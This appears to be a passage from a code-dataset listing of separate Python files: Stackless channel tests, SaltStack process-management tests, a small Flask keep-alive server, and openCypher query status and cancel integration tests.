# Get the tasklet blocked on the channel.
channel = stackless.channel()
tasklet = stackless.tasklet(f)(channel)
tasklet.run()
# Make sure that the current tasklet cannot block when it tries to receive. We do not want
# to exit this test having clobbered the block trapping value, so we make sure we restore
# it.
oldBlockTrap = stackless.getcurrent().block_trap
try:
stackless.getcurrent().block_trap = True
channel.send(originalValue)
finally:
stackless.getcurrent().block_trap = oldBlockTrap
self.assertTrue(len(receivedValues) == 1 and receivedValues[0] == originalValue, "We sent a value, but it was not the one we received. Completely unexpected.")
def testNonBlockingReceive(self):
''' Test that when there is a waiting sender, we can receive without blocking with normal channel behaviour. '''
originalValue = 1
# Function to block when run in a tasklet.
def f(testChannel, valueToSend):
testChannel.send(valueToSend)
# Get the tasklet blocked on the channel.
channel = stackless.channel()
tasklet = stackless.tasklet(f)(channel, originalValue)
tasklet.run()
# Make sure that the current tasklet cannot block when it tries to receive. We do not want
# to exit this test having clobbered the block trapping value, so we make sure we restore
# it.
oldBlockTrap = stackless.getcurrent().block_trap
try:
stackless.getcurrent().block_trap = True
value = channel.receive()
finally:
stackless.getcurrent().block_trap = oldBlockTrap
tasklet.kill()
self.assertEqual(value, originalValue, "We received a value, but it was not the one we sent. Completely unexpected.")
@require_one_thread
def testMainTaskletBlockingWithoutASender(self):
''' Test that the last runnable tasklet cannot be blocked on a channel. '''
c = stackless.channel()
self.assertRaises(RuntimeError, c.receive)
@unittest.skipUnless(withThreads, "Compiled without threading")
def testInterthreadCommunication(self):
''' Test that tasklets in different threads sending over channels to each other work. '''
commandChannel = stackless.channel()
def master_func():
commandChannel.send("ECHO 1")
commandChannel.send("ECHO 2")
commandChannel.send("ECHO 3")
commandChannel.send("QUIT")
def slave_func():
while 1:
command = commandChannel.receive()
if command == "QUIT":
break
def scheduler_run(tasklet_func):
t = stackless.tasklet(tasklet_func)()
while t.alive:
stackless.run()
thread = threading.Thread(target=scheduler_run, args=(master_func,))
thread.start()
scheduler_run(slave_func)
thread.join()
def testSendException(self):
# Function to send the exception
def f(testChannel):
testChannel.send_exception(ValueError, 1, 2, 3)
# Get the tasklet blocked on the channel.
channel = stackless.channel()
tasklet = stackless.tasklet(f)(channel)
tasklet.run()
self.assertRaises(ValueError, channel.receive)
tasklet = stackless.tasklet(f)(channel)
tasklet.run()
try:
channel.receive()
except ValueError as e:
self.assertEqual(e.args, (1, 2, 3))
def testSendThrow(self):
# subfunction in tasklet
def bar():
raise ValueError(1, 2, 3)
# Function to send the exception
def f(testChannel):
try:
bar()
except Exception:
testChannel.send_throw(*sys.exc_info())
# Get the tasklet blocked on the channel.
channel = stackless.channel()
tasklet = stackless.tasklet(f)(channel)
tasklet.run()
self.assertRaises(ValueError, channel.receive)
tasklet = stackless.tasklet(f)(channel)
tasklet.run()
try:
channel.receive()
except ValueError:
exc, val, tb = sys.exc_info()
self.assertEqual(val.args, (1, 2, 3))
# Check that the traceback is correct
l = traceback.extract_tb(tb)
self.assertEqual(l[-1][2], "bar")
def testBlockTrapSend(self):
'''Test that block trapping works when receiving'''
channel = stackless.channel()
count = [0]
def f():
with block_trap():
self.assertRaises(RuntimeError, channel.send, None)
count[0] += 1
# Test on main tasklet and on worker
f()
stackless.tasklet(f)()
stackless.run()
self.assertEqual(count[0], 2)
def testBlockTrapRecv(self):
'''Test that block trapping works when receiving'''
channel = stackless.channel()
count = [0]
def f():
with block_trap():
self.assertRaises(RuntimeError, channel.receive)
count[0] += 1
f()
stackless.tasklet(f)()
stackless.run()
self.assertEqual(count[0], 2)
class TestClose(StacklessTestCase):
"""Test using close semantics with channels"""
def setUp(self):
super(TestClose, self).setUp()
self.c = stackless.channel()
# TODO: This test shows how ill conceived the current closing/closed semantics are.
# See https://bitbucket.org/stackless-dev/stackless/issues/53
def testSequence(self):
def sender():
self.c.send_sequence(range(10))
self.c.close()
# this needs to change, close does not wake up a receiver, we must pump it
while self.c.closing and not self.c.closed:
self.c.send(None)
data = []
def receiver():
for i in self.c:
data.append(i)
# remove the extra "pump" nones at the end....
while data[-1] is None:
data.pop(-1)
data.append(10)
stackless.tasklet(sender)()
stackless.tasklet(receiver)()
stackless.run()
self.assertEqual(data, list(range(11)))
self.assertTrue(self.c.closed)
def testSequence2(self):
def sender():
length = self.c.send_sequence(range(10))
self.assertEqual(length, 10)
# A future version of Stackless may send StopIteration
# automatically, if you close the channel
# See https://bitbucket.org/stackless-dev/stackless/issues/53
self.c.send_exception(StopIteration)
self.c.close()
data = []
def receiver():
for i in self.c:
data.append(i)
stackless.tasklet(sender)()
stackless.tasklet(receiver)()
stackless.run()
self.assertEqual(data, list(range(10)))
self.assertTrue(self.c.closed)
def testSender(self):
self.c.close()
self.assertRaises(ValueError, self.c.send, None)
def testReceiver(self):
self.c.close()
self.assertRaises(ValueError, self.c.receive)
def testIterator(self):
self.c.close()
i = iter(self.c)
def n():
return next(i)
self.assertRaises(StopIteration, n)
class Subclassing(StacklessTestCase):
def test_init(self):
"""Test that we can subclass channel without overriding __new__"""
class myclass(stackless.channel):
def __init__(self, name):
super(myclass, self).__init__()
self.name = name
name = "bong"
c = myclass(name)
self.assertEqual(c.name, name)
if __name__ == '__main__':
if not sys.argv[1:]:
sys.argv.append('-v')
unittest.main()
|
test_process.py
|
# -*- coding: utf-8 -*-
# Import python libs
from __future__ import absolute_import, print_function, unicode_literals
import io
import os
import sys
import threading
import time
import signal
import multiprocessing
import functools
import datetime
import warnings
# Import Salt Testing libs
from tests.support.unit import TestCase, skipIf
from tests.support.mock import (
patch,
NO_MOCK,
NO_MOCK_REASON
)
# Import salt libs
import salt.utils.platform
import salt.utils.process
# Import 3rd-party libs
from salt.ext import six
from salt.ext.six.moves import range # pylint: disable=import-error,redefined-builtin
import psutil
def die(func):
'''
Add proc title
'''
@functools.wraps(func)
def wrapper(self):
# Strip off the "test_" from the function name
name = func.__name__[5:]
def _die():
salt.utils.process.appendproctitle('test_{0}'.format(name))
setattr(self, 'die_' + name, _die)
return wrapper
def incr(func):
'''
Increment counter
'''
@functools.wraps(func)
def wrapper(self):
# Strip off the "test_" from the function name
name = func.__name__[5:]
def _incr(counter, num):
salt.utils.process.appendproctitle('test_{0}'.format(name))
for _ in range(0, num):
counter.value += 1
setattr(self, 'incr_' + name, _incr)
return wrapper
def spin(func):
'''
Spin indefinitely
'''
@functools.wraps(func)
def wrapper(self):
# Strip off the "test_" from the function name
name = func.__name__[5:]
def _spin():
salt.utils.process.appendproctitle('test_{0}'.format(name))
while True:
time.sleep(1)
setattr(self, 'spin_' + name, _spin)
return wrapper
class TestProcessManager(TestCase):
@spin
def test_basic(self):
'''
Make sure that the process is alive 2s later
'''
process_manager = salt.utils.process.ProcessManager()
process_manager.add_process(self.spin_basic)
initial_pid = next(six.iterkeys(process_manager._process_map))
time.sleep(2)
process_manager.check_children()
try:
assert initial_pid == next(six.iterkeys(process_manager._process_map))
finally:
process_manager.stop_restarting()
process_manager.kill_children()
time.sleep(0.5)
# Are there child processes still running?
if process_manager._process_map.keys():
process_manager.send_signal_to_processes(signal.SIGKILL)
process_manager.stop_restarting()
process_manager.kill_children()
@spin
def test_kill(self):
process_manager = salt.utils.process.ProcessManager()
process_manager.add_process(self.spin_kill)
initial_pid = next(six.iterkeys(process_manager._process_map))
# kill the child
if salt.utils.platform.is_windows():
os.kill(initial_pid, signal.SIGTERM)
else:
os.kill(initial_pid, signal.SIGKILL)
# give the OS time to give the signal...
time.sleep(0.1)
process_manager.check_children()
try:
assert initial_pid != next(six.iterkeys(process_manager._process_map))
finally:
process_manager.stop_restarting()
process_manager.kill_children()
time.sleep(0.5)
# Are there child processes still running?
if process_manager._process_map.keys():
process_manager.send_signal_to_processes(signal.SIGKILL)
process_manager.stop_restarting()
process_manager.kill_children()
@die
def test_restarting(self):
'''
Make sure that the process is alive 2s later
'''
process_manager = salt.utils.process.ProcessManager()
process_manager.add_process(self.die_restarting)
initial_pid = next(six.iterkeys(process_manager._process_map))
time.sleep(2)
process_manager.check_children()
try:
assert initial_pid != next(six.iterkeys(process_manager._process_map))
finally:
process_manager.stop_restarting()
process_manager.kill_children()
time.sleep(0.5)
# Are there child processes still running?
if process_manager._process_map.keys():
process_manager.send_signal_to_processes(signal.SIGKILL)
process_manager.stop_restarting()
process_manager.kill_children()
@skipIf(sys.version_info < (2, 7), 'Needs > Py 2.7 due to bug in stdlib')
@incr
def test_counter(self):
counter = multiprocessing.Value('i', 0)
process_manager = salt.utils.process.ProcessManager()
process_manager.add_process(self.incr_counter, args=(counter, 2))
time.sleep(1)
process_manager.check_children()
time.sleep(1)
# we should have had 2 processes go at it
try:
assert counter.value == 4
finally:
process_manager.stop_restarting()
process_manager.kill_children()
time.sleep(0.5)
# Are there child processes still running?
if process_manager._process_map.keys():
process_manager.send_signal_to_processes(signal.SIGKILL)
process_manager.stop_restarting()
process_manager.kill_children()
class TestThreadPool(TestCase):
def test_basic(self):
'''
Make sure the threadpool can do things
'''
def incr_counter(counter):
counter.value += 1
counter = multiprocessing.Value('i', 0)
pool = salt.utils.process.ThreadPool()
sent = pool.fire_async(incr_counter, args=(counter,))
self.assertTrue(sent)
time.sleep(1) # Sleep to let the threads do things
self.assertEqual(counter.value, 1)
self.assertEqual(pool._job_queue.qsize(), 0)
def test_full_queue(self):
'''
Make sure that a full threadpool acts as we expect
'''
def incr_counter(counter):
counter.value += 1
counter = multiprocessing.Value('i', 0)
# Create a pool with no workers and 1 queue size
pool = salt.utils.process.ThreadPool(0, 1)
# make sure we can put the one item in
sent = pool.fire_async(incr_counter, args=(counter,))
self.assertTrue(sent)
# make sure we can't put more in
sent = pool.fire_async(incr_counter, args=(counter,))
self.assertFalse(sent)
time.sleep(1) # Sleep to let the threads do things
# make sure no one updated the counter
self.assertEqual(counter.value, 0)
# make sure the queue is still full
self.assertEqual(pool._job_queue.qsize(), 1)
class TestProcess(TestCase):
@skipIf(NO_MOCK, NO_MOCK_REASON)
def test_daemonize_if(self):
# pylint: disable=assignment-from-none
with patch('sys.argv', ['salt-call']):
ret = salt.utils.process.daemonize_if({})
self.assertEqual(None, ret)
ret = salt.utils.process.daemonize_if({'multiprocessing': False})
self.assertEqual(None, ret)
with patch('sys.platform', 'win'):
ret = salt.utils.process.daemonize_if({})
self.assertEqual(None, ret)
with patch('salt.utils.process.daemonize'), \
patch('sys.platform', 'linux2'):
salt.utils.process.daemonize_if({})
self.assertTrue(salt.utils.process.daemonize.called)
# pylint: enable=assignment-from-none
class TestSignalHandlingProcess(TestCase):
@classmethod
def Process(cls, pid):
raise psutil.NoSuchProcess(pid)
@classmethod
def target(cls):
os.kill(os.getpid(), signal.SIGTERM)
@classmethod
def children(cls, *args, **kwargs):
raise psutil.NoSuchProcess(1)
@skipIf(NO_MOCK, NO_MOCK_REASON)
def test_process_does_not_exist(self):
try:
with patch('psutil.Process', self.Process):
proc = salt.utils.process.SignalHandlingProcess(target=self.target)
proc.start()
except psutil.NoSuchProcess:
assert False, "psutil.NoSuchProcess raised"
@skipIf(NO_MOCK, NO_MOCK_REASON)
def test_process_children_do_not_exist(self):
try:
with patch('psutil.Process.children', self.children):
proc = salt.utils.process.SignalHandlingProcess(target=self.target)
proc.start()
except psutil.NoSuchProcess:
assert False, "psutil.NoSuchProcess raised"
@staticmethod
def run_forever_sub_target(evt):
'Used by run_forever_target to create a sub-process'
while not evt.is_set():
time.sleep(1)
@staticmethod
def run_forever_target(sub_target, evt):
'A target that will run forever or until an event is set'
p = multiprocessing.Process(target=sub_target, args=(evt,))
p.start()
p.join()
@staticmethod
def kill_target_sub_proc():
pid = os.fork()
if pid == 0:
return
pid = os.fork()
if pid == 0:
return
time.sleep(.1)
try:
os.kill(os.getpid(), signal.SIGINT)
except KeyboardInterrupt:
pass
@skipIf(sys.platform.startswith('win'), 'No os.fork on Windows')
def test_signal_processing_regression_test(self):
evt = multiprocessing.Event()
sh_proc = salt.utils.process.SignalHandlingProcess(
target=self.run_forever_target,
args=(self.run_forever_sub_target, evt)
)
sh_proc.start()
proc = multiprocessing.Process(target=self.kill_target_sub_proc)
proc.start()
proc.join()
# When the bug exists, the kill_target_sub_proc signal will kill both
# processes. sh_proc will be alive if the bug is fixed
try:
assert sh_proc.is_alive()
finally:
evt.set()
sh_proc.join()
@staticmethod
def no_op_target():
pass
@skipIf(NO_MOCK, NO_MOCK_REASON)
def test_signal_processing_test_after_fork_called(self):
'Validate Process and sub classes call after fork methods'
evt = multiprocessing.Event()
sig_to_mock = 'salt.utils.process.SignalHandlingProcess._setup_signals'
log_to_mock = 'salt.utils.process.Process._setup_process_logging'
with patch(sig_to_mock) as ma, patch(log_to_mock) as mb:
self.sh_proc = salt.utils.process.SignalHandlingProcess(target=self.no_op_target)
self.sh_proc.run()
ma.assert_called()
mb.assert_called()
@skipIf(NO_MOCK, NO_MOCK_REASON)
def test_signal_processing_test_final_methods_called(self):
'Validate Process and sub classes call finalize methods'
evt = multiprocessing.Event()
teardown_to_mock = 'salt.log.setup.shutdown_multiprocessing_logging'
log_to_mock = 'salt.utils.process.Process._setup_process_logging'
sig_to_mock = 'salt.utils.process.SignalHandlingProcess._setup_signals'
# Mock _setup_signals so we do not register one for this process.
with patch(sig_to_mock):
with patch(teardown_to_mock) as ma, patch(log_to_mock) as mb:
self.sh_proc = salt.utils.process.SignalHandlingProcess(target=self.no_op_target)
self.sh_proc.run()
ma.assert_called()
mb.assert_called()
@staticmethod
def pid_setting_target(sub_target, val, evt):
val.value = os.getpid()
p = multiprocessing.Process(target=sub_target, args=(evt,))
p.start()
p.join()
@skipIf(sys.platform.startswith('win'), 'Required signals not supported on windows')
def test_signal_processing_handle_signals_called(self):
'Validate SignalHandlingProcess handles signals'
# Gloobal event to stop all processes we're creating
evt = multiprocessing.Event()
# Create a process to test signal handler
val = multiprocessing.Value('i', 0)
proc = salt.utils.process.SignalHandlingProcess(
target=self.pid_setting_target,
args=(self.run_forever_sub_target, val, evt),
)
proc.start()
# Create a second process that should not respond to SIGINT or SIGTERM
proc2 = multiprocessing.Process(
target=self.run_forever_target,
args=(self.run_forever_sub_target, evt),
)
proc2.start()
# Wait for the sub process to set it's pid
while not val.value:
time.sleep(.3)
assert not proc.signal_handled()
# Send a signal that should get handled by the subprocess
os.kill(val.value, signal.SIGTERM)
# wait up to 10 seconds for signal handler:
start = time.time()
while time.time() - start < 10:
if proc.signal_handled():
break
time.sleep(.3)
try:
# Allow some time for the signal handler to do it's thing
assert proc.signal_handled()
# Reap the signaled process
proc.join(1)
assert proc2.is_alive()
finally:
evt.set()
proc2.join(30)
proc.join(30)
class TestDup2(TestCase):
def test_dup2_no_fileno(self):
'The dup2 method does not fail on streams without fileno support'
f1 = io.StringIO("some initial text data")
f2 = io.StringIO("some initial other text data")
with self.assertRaises(io.UnsupportedOperation):
f1.fileno()
with patch('os.dup2') as dup_mock:
try:
salt.utils.process.dup2(f1, f2)
except io.UnsupportedOperation:
assert False, 'io.UnsupportedOperation was raised'
assert not dup_mock.called
def null_target():
pass
def event_target(event):
while True:
if event.wait(5):
break
class TestProcessList(TestCase):
@staticmethod
def wait_for_proc(proc, timeout=10):
start = time.time()
while proc.is_alive():
if time.time() - start > timeout:
raise Exception("Process did not finishe before timeout")
time.sleep(.3)
def test_process_list_process(self):
plist = salt.utils.process.SubprocessList()
proc = multiprocessing.Process(target=null_target)
proc.start()
plist.add(proc)
assert proc in plist.processes
self.wait_for_proc(proc)
assert not proc.is_alive()
plist.cleanup()
assert proc not in plist.processes
def test_process_list_thread(self):
plist = salt.utils.process.SubprocessList()
thread = threading.Thread(target=null_target)
thread.start()
plist.add(thread)
assert thread in plist.processes
self.wait_for_proc(thread)
assert not thread.is_alive()
plist.cleanup()
assert thread not in plist.processes
def test_process_list_cleanup(self):
plist = salt.utils.process.SubprocessList()
event = multiprocessing.Event()
proc = multiprocessing.Process(target=event_target, args=[event])
proc.start()
plist.add(proc)
assert proc in plist.processes
plist.cleanup()
event.set()
assert proc in plist.processes
self.wait_for_proc(proc)
assert not proc.is_alive()
plist.cleanup()
assert proc not in plist.processes
class TestDeprecatedClassNames(TestCase):
def process_target(self):
time.sleep(1)
def test_multiprocessing_process_warning(self):
# We *always* want *all* warnings thrown on this module
warnings.filterwarnings('always', '', DeprecationWarning, __name__)
fake_utcnow = datetime.date(2021, 1, 1)
proc = None
try:
with patch('salt.utils.versions._get_utcnow_date', return_value=fake_utcnow):
# Test warning
with warnings.catch_warnings(record=True) as recorded_warnings:
proc = salt.utils.process.MultiprocessingProcess(target=self.process_target)
self.assertEqual(
'Please stop using \'salt.utils.process.MultiprocessingProcess\' '
'and instead use \'salt.utils.process.Process\'. '
'\'salt.utils.process.MultiprocessingProcess\' will go away '
'after 2022-01-01.',
six.text_type(recorded_warnings[0].message)
)
finally:
if proc is not None:
del proc
def test_multiprocessing_process_runtime_error(self):
fake_utcnow = datetime.date(2022, 1, 1)
proc = None
try:
with patch('salt.utils.versions._get_utcnow_date', return_value=fake_utcnow):
with self.assertRaisesRegex(
RuntimeError,
r'Please stop using \'salt.utils.process.MultiprocessingProcess\' '
r'and instead use \'salt.utils.process.Process\'. '
r'\'salt.utils.process.MultiprocessingProcess\' will go away '
r'after 2022-01-01. '
r'This warning\(now exception\) triggered on '
r'filename \'(.*)test_process.py\', line number ([\d]+), is '
r'supposed to be shown until ([\d-]+). Today is ([\d-]+). '
r'Please remove the warning.'):
proc = salt.utils.process.MultiprocessingProcess(target=self.process_target)
finally:
if proc is not None:
del proc
def test_signal_handling_multiprocessing_process_warning(self):
# We *always* want *all* warnings thrown on this module
warnings.filterwarnings('always', '', DeprecationWarning, __name__)
fake_utcnow = datetime.date(2021, 1, 1)
proc = None
try:
with patch('salt.utils.versions._get_utcnow_date', return_value=fake_utcnow):
# Test warning
with warnings.catch_warnings(record=True) as recorded_warnings:
proc = salt.utils.process.SignalHandlingMultiprocessingProcess(target=self.process_target)
self.assertEqual(
'Please stop using \'salt.utils.process.SignalHandlingMultiprocessingProcess\' '
'and instead use \'salt.utils.process.SignalHandlingProcess\'. '
'\'salt.utils.process.SignalHandlingMultiprocessingProcess\' will go away '
'after 2022-01-01.',
six.text_type(recorded_warnings[0].message)
)
finally:
if proc is not None:
del proc
def test_signal_handling_multiprocessing_process_runtime_error(self):
fake_utcnow = datetime.date(2022, 1, 1)
proc = None
try:
with patch('salt.utils.versions._get_utcnow_date', return_value=fake_utcnow):
with self.assertRaisesRegex(
RuntimeError,
r'Please stop using \'salt.utils.process.SignalHandlingMultiprocessingProcess\' '
r'and instead use \'salt.utils.process.SignalHandlingProcess\'. '
r'\'salt.utils.process.SignalHandlingMultiprocessingProcess\' will go away '
r'after 2022-01-01. '
r'This warning\(now exception\) triggered on '
r'filename \'(.*)test_process.py\', line number ([\d]+), is '
r'supposed to be shown until ([\d-]+). Today is ([\d-]+). '
r'Please remove the warning.'):
proc = salt.utils.process.SignalHandlingMultiprocessingProcess(target=self.process_target)
finally:
if proc is not None:
del proc
|
keep_alive.py
|
from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def home():
return "Hello. I am Alfred!"
def run():
app.run(host='0.0.0.0',port=8080)
def keep_alive():
t = Thread(target=run)
t.start()
|
test_opencypher_status_without_iam.py
|
"""
Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
SPDX-License-Identifier: Apache-2.0
"""
import threading
import logging
import time
import requests
from test.integration.DataDrivenOpenCypherTest import DataDrivenOpenCypherTest
logger = logging.getLogger('TestOpenCypherStatusWithoutIam')
class TestOpenCypherStatusWithoutIam(DataDrivenOpenCypherTest):
def do_opencypher_query_save_result(self, query, res):
try:
res = self.client.opencypher_http(query)
res.raise_for_status()
res['result'] = res.json()
except requests.HTTPError as exception:
res['error'] = exception.response.json()
def setUp(self) -> None:
super().setUp()
res = self.client.opencypher_status()
res.raise_for_status()
status = res.json()
for q in status['queries']:
self.client.opencypher_cancel(q['queryId'])
def test_do_opencypher_status_nonexistent(self):
query_id = "ac7d5a03-00cf-4280-b464-edbcbf51ffce"
status = self.client.opencypher_status(query_id)
assert status.status_code != 200
err = status.json()
self.assertEqual(err['code'], "InvalidParameterException")
expected_message = f'Supplied queryId {query_id} is invalid'
self.assertEqual(err['detailedMessage'], expected_message)
def test_do_opencypher_cancel_nonexistent(self):
query_id = "ac7d5a03-00cf-4280-b464-edbcbf51ffce"
res = self.client.opencypher_cancel(query_id)
assert res.status_code != 200
err = res.json()
self.assertEqual(err['code'], "InvalidParameterException")
expected_message = f'Supplied queryId {query_id} is invalid'
self.assertEqual(err['detailedMessage'], expected_message)
def test_do_opencypher_cancel_empty_query_id(self):
with self.assertRaises(ValueError):
self.client.opencypher_cancel('')
def test_do_opencypher_cancel_non_str_query_id(self):
with self.assertRaises(ValueError):
self.client.opencypher_cancel(42)
def test_do_opencypher_status_and_cancel(self):
query = '''MATCH(a)-->(b)
MATCH(c)-->(d)
MATCH(e)-->(f)
RETURN a,b,c,d,e,f'''
query_res = {}
oc_query_thread = threading.Thread(target=self.do_opencypher_query_save_result, args=(query, query_res,))
oc_query_thread.start()
time.sleep(1)
res = self.client.opencypher_status()
res.raise_for_status()
status_res = res.json()
assert 'acceptedQueryCount' in status_res
assert 'runningQueryCount' in status_res
assert status_res['runningQueryCount'] >= 1
assert 'queries' in status_res
query_id = ''
for q in status_res['queries']:
if query in q['queryString']:
query_id = q['queryId']
assert query_id != ''
res = self.client.opencypher_cancel(query_id)
res.raise_for_status()
cancel_res = res.json()
assert cancel_res['status'] == '200 OK'
oc_query_thread.join()
assert 'error' in query_res
assert 'code' in query_res['error']
assert 'requestId' in query_res['error']
assert 'detailedMessage' in query_res['error']
assert 'CancelledByUserException' == query_res['error']['code']
def test_do_sparql_status_and_cancel_silently(self):
query = '''MATCH(a)-->(b)
MATCH(c)-->(d)
RETURN a,b,c,d'''
query_res = {}
oc_query_thread = threading.Thread(target=self.do_opencypher_query_save_result, args=(query, query_res,))
oc_query_thread.start()
time.sleep(3)
query_id = ''
status = self.client.opencypher_status(query_id)
assert status.status_code == 200
status_res = status.json()
assert type(status_res) is dict
assert 'acceptedQueryCount' in status_res
assert 'runningQueryCount' in status_res
assert 1 == status_res['runningQueryCount']
assert 'queries' in status_res
query_id = ''
for q in status_res['queries']:
if query in q['queryString']:
query_id = q['queryId']
assert query_id != ''
self.assertNotEqual(query_id, '')
cancel = self.client.opencypher_cancel(query_id)
cancel_res = cancel.json()
assert type(cancel_res) is dict
assert cancel_res['status'] == '200 OK'
oc_query_thread.join()
assert type(query_res['result']) is dict
assert 'a' in query_res['result']['head']['vars']
assert 'b' in query_res['result']['head']['vars']
assert 'c' in query_res['result']['head']['vars']
assert 'd' in query_res['result']['head']['vars']
assert [] == query_res['result']['results']['bindings']
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.